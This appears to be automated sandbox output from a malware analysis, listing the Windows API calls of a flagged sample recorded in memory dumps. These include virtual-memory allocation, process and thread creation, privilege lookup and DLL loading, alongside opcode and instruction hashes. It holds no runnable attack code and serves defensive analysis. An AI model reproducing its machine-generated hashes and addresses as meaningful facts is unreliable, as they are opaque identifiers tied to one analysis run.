                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: 10c9745f0b4d560d43b1e76fc187661612edb69f83708a70d80f6f6f14bd14e2
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: E3F0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158649BA1D97241DA30E8118BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027A2D11,00002000,00003000,00000004), ref: 027B83D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: 037dfc1270f110aa0378d8906236b062abd3b0417609581a499a313012f70687
                                                                    • Instruction ID: 5b76654a31d8bbd14c50a738c60ef6be987df80fab23dad9e1fbcb9e3bec821a
                                                                    • Opcode Fuzzy Hash: 037dfc1270f110aa0378d8906236b062abd3b0417609581a499a313012f70687
                                                                    • Instruction Fuzzy Hash: EEF01CB5200118ABDB14DF89CC81EE777ADEF8C350F158649FE1997240C630E811CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027A2D11,00002000,00003000,00000004), ref: 027B83D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: ecbea571fa3973e3fc283ffd116125ef1da510f520de35ccd41e41bd2bd79f41
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: EEF015B2200208ABCB14DF89CC80EEB77ADAF8C750F118549FE0897241C630F810CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(027B3D30,?,?,027B3D30,00000000,FFFFFFFF), ref: 027B8315
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: e484c21c8767c3a88017d74f44b675757c46a4d1cf76f83b444d2e3a4c3ff229
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: E6D012752002146BD711EF99CC45FD7775DEF48750F154455BA185B241C530F9008AE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                                                    • Instruction ID: 356edf8a4880885a38f981b1f7cb51325498aa8af4b22352ec53afeccdb78dc1
                                                                    • Opcode Fuzzy Hash: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                                                    • Instruction Fuzzy Hash: 6590027124100417F12171598504B07000997E4285F91C426E041556CD9696D956B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                                                    • Instruction ID: e9182d5674df18e909ebbbe354946ca3a1ddf629a08fb0611876639156d16006
                                                                    • Opcode Fuzzy Hash: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                                                    • Instruction Fuzzy Hash: E8900271282041567555B15984049074006A7F4285791C026E1405964C8566E85AF661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                                                    • Instruction ID: 014803386cd8810602c251efe0935cf1a4baac3dcc5d38263e231dc1db4d369a
                                                                    • Opcode Fuzzy Hash: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                                                    • Instruction Fuzzy Hash: AC900275251000072115B5594704907004697E9395351C035F1006564CD661D8657161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
                                                                    • Instruction ID: 74aa8e86e2f7bb37929717a47a70ff237d1053beaa36617bd96d71a4dd707d8a
                                                                    • Opcode Fuzzy Hash: 478bcfdae1b57f3de11369c92c438c8d5993098611d7834981c84dee63299966
                                                                    • Instruction Fuzzy Hash: E09002B124100406F15071598404B46000597E4345F51C025E5055568E8699DDD976A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
                                                                    • Instruction ID: 0285e9a219eecfcee0d3d06970f113eedea83386e4e323b86394dc11226a7b31
                                                                    • Opcode Fuzzy Hash: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
                                                                    • Instruction Fuzzy Hash: 4D9002B124200007611571598414A16400A97F4245B51C035E10055A4DC565D8957165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
                                                                    • Instruction ID: 6eb0536df7aa76879015fc4e4c51f8e867ee5c2c6263e31910def88e0237a7e6
                                                                    • Opcode Fuzzy Hash: 3164e1acd64d050efa56df02e126c996f7025b9ba590d28258a871f74d7c9367
                                                                    • Instruction Fuzzy Hash: DB9002B138100446F11071598414F060005D7F5345F51C029E1055568D8659DC567166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
                                                                    • Instruction ID: 5584065e4659a6f654b6ed98886a48f8ed3146c547bc0abd48e41dbbb9215a97
                                                                    • Opcode Fuzzy Hash: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
                                                                    • Instruction Fuzzy Hash: 5590027124100806F19071598404A4A000597E5345F91C029E0016668DCA55DA5D77E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
                                                                    • Instruction ID: d3fe303099351703a85c377f53a3ef3396e372accd24bd13159cce221aaaee8f
                                                                    • Opcode Fuzzy Hash: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
                                                                    • Instruction Fuzzy Hash: 7B90027124504846F15071598404E46001597E4349F51C025E00556A8D9665DD59B6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
                                                                    • Instruction ID: da1b5b1533e02d3d9bfbded9e282c543c35d2a227b6d9b7ee6d109a17ad8b6ea
                                                                    • Opcode Fuzzy Hash: 6511ed7942e651bbf6f9128f594b8f2b548ba181a5b8f66c1fc05159fa31484b
                                                                    • Instruction Fuzzy Hash: EB90027125180046F21075698C14F07000597E4347F51C129E0145568CC955D8657561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
                                                                    • Instruction ID: edab0d42843aaa35cee782205310f3b0cd00cd190351771c6fb6a8024e779e0f
                                                                    • Opcode Fuzzy Hash: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
                                                                    • Instruction Fuzzy Hash: A990027124108806F1207159C404B4A000597E4345F55C425E441566CD86D5D8957161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
                                                                    • Instruction ID: 81c3fc9cf431b443248c8f45a049a5a1c52b15b03f8d4c4df705f79ba51fb8c5
                                                                    • Opcode Fuzzy Hash: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
                                                                    • Instruction Fuzzy Hash: 7D90027124100846F11071598404F46000597F4345F51C02AE0115668D8655D8557561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
                                                                    • Instruction ID: 0d08fb4d96013d097328c51371e05d333170b4d6e436f6c09bf41ed0021d4fc1
                                                                    • Opcode Fuzzy Hash: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
                                                                    • Instruction Fuzzy Hash: 9890027124100406F11075999408A46000597F4345F51D025E5015569EC6A5D8957171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
                                                                    • Instruction ID: bdcf523ae27eb52ecf403699949c1880f3aa041d7a75a4a921619b7a5b918841
                                                                    • Opcode Fuzzy Hash: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
                                                                    • Instruction Fuzzy Hash: 6C90027135114406F1207159C404B06000597E5245F51C425E081556CD86D5D8957162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                                                    • Associated: 0000000A.00000002.917831843.000000000482B000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000A.00000002.917844681.000000000482F000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
                                                                    • Instruction ID: b619b6b36c51970f45ae2b25bfcb1fdb726bb728d7f4f3a6b61ad7235f31f14f
                                                                    • Opcode Fuzzy Hash: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
                                                                    • Instruction Fuzzy Hash: 0890027925300006F19071599408A0A000597E5246F91D429E000656CCC955D86D7361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(027B3516,?,027B3C8F,027B3C8F,?,027B3516,?,?,?,?,?,00000000,00000000,?), ref: 027B84BD
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027A3B93), ref: 027B84FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocateFree
                                                                    • String ID: .z`
                                                                    • API String ID: 2488874121-1441809116
                                                                    • Opcode ID: 636bb4e0985d494f8f68c904eeab0b72ba881fe1c69e57ab776b9d740c15c4ef
                                                                    • Instruction ID: 35121c3e741c5495007710f29119ede524f0e41c0565543c63a8f1a7fb9057bb
                                                                    • Opcode Fuzzy Hash: 636bb4e0985d494f8f68c904eeab0b72ba881fe1c69e57ab776b9d740c15c4ef
                                                                    • Instruction Fuzzy Hash: 9AF0F6F82087445FD711EF69DC809EB7799AF84318B54894AE89987302D231D815CFF1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 027B6F88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                    • Instruction ID: e88afeaa5d0154592275cd3418356f99b624d88518fc634b8a07c06f47e6e68f
                                                                    • Opcode Fuzzy Hash: a6c48969d60db3ceed74e40211ad581f30d69321df0dca94363978bf35b7afca
                                                                    • Instruction Fuzzy Hash: 85317EB5602704AFC726DFA8C8A5FA7B7B9EF88700F00851DF61A6B241D770A545CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 027B6F88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 22f3f9b70c019651f3ea608c6226588e33adb11c953e50c7e48f9f0fa5cc69eb
                                                                    • Instruction ID: a15047ac32053ee1a5240af7326d1ebfa99b6fea473626debb96c41d597d9cf2
                                                                    • Opcode Fuzzy Hash: 22f3f9b70c019651f3ea608c6226588e33adb11c953e50c7e48f9f0fa5cc69eb
                                                                    • Instruction Fuzzy Hash: 8321A0B1602304AFC712DFA8C8A5FABBBB9AF49700F00816DF6196B241D774A545CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027A3B93), ref: 027B84FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: ed5c16ac1959aa08a283588dc7ba5f26a9ba2a08c885b3ff247c572705a2127d
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: ABE046B1200208ABDB18EF99CC48EE777ADEF88750F018959FE085B241CA30F910CAF0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027A72BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027A72DB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                    • Instruction ID: 452545f4d7f1b69eeb1adb99ae04544ad3c0e77edd807f0b78806c7130a83351
                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                    • Instruction Fuzzy Hash: 39012B31A8122877E722A6948C42FFFB72C9F40F50F040115FF04BA1C1E69479064BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027A9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: cbed0d2ae09381d7ffe9ae140bd976959eb793ceefbe8c67c97434ddbac464e6
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: A3011EB5D0020DBBDF11EAA4DC55FDEB7B99F44308F004295AA1897240F631EB14CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027B8594
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: e1376d3e392b7a42f96a6d49e90ee8cad5bb49ff655c4688337e95a8098aa6e2
                                                                    • Instruction ID: 51090111b42b8b7292bec5ed016097d9536d98e33d14500b8d0517066fa7071a
                                                                    • Opcode Fuzzy Hash: e1376d3e392b7a42f96a6d49e90ee8cad5bb49ff655c4688337e95a8098aa6e2
                                                                    • Instruction Fuzzy Hash: C901F2B2214109ABCB44DF99DC80DEB3BAEAF8C354F15864CFA4D97205C630E8418BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027B8594
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: b22708aef90ab4900b77410630077329082a8a3676e78d0856c698d7cd443a08
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: 2401AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027ACCD0,?,?), ref: 027B704C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                    • Instruction ID: c37423521b847330f3b5809c94ef47942b1d669016574a0cbe32bd5b6d36e246
                                                                    • Opcode Fuzzy Hash: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
                                                                    • Instruction Fuzzy Hash: 83E092333903043AE33265999C02FE7B39DCF81B20F550026FB0DEB2C0D5A5F80146A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027ACCD0,?,?), ref: 027B704C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 0e61a3bc657e3211192489dfe3d2e651928539f5e83b842a25baa40b13e4bea0
                                                                    • Instruction ID: 6fc48afb7b5b7ce8ff4be87b1089de60cc88d3d7179c4dd2384f572d9d84b8d3
                                                                    • Opcode Fuzzy Hash: 0e61a3bc657e3211192489dfe3d2e651928539f5e83b842a25baa40b13e4bea0
                                                                    • Instruction Fuzzy Hash: F9F061337803003BD37225A88C43FE7739A8F80B10F640016F709EB2C0C5A4F84146A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,027ACFA2,027ACFA2,?,00000000,?,?), ref: 027B8660
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 0ffd9294622fc9b59c2c20011176bdd86c25b7fda7c124958aa638d808fd9f66
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: 3EE01AB12002086BDB10DF49CC84EE737ADAF88650F018555FA0857241C930E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(027B3516,?,027B3C8F,027B3C8F,?,027B3516,?,?,?,?,?,00000000,00000000,?), ref: 027B84BD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Offset: 027A0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: 8c90f0bc87e1ff9d2c9f2ddd856087f489caec1d1140bf3f3acd76a76f9be17e
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB14EF99CC44EA777ADAF88650F118959FA085B241CA30F9108AF0
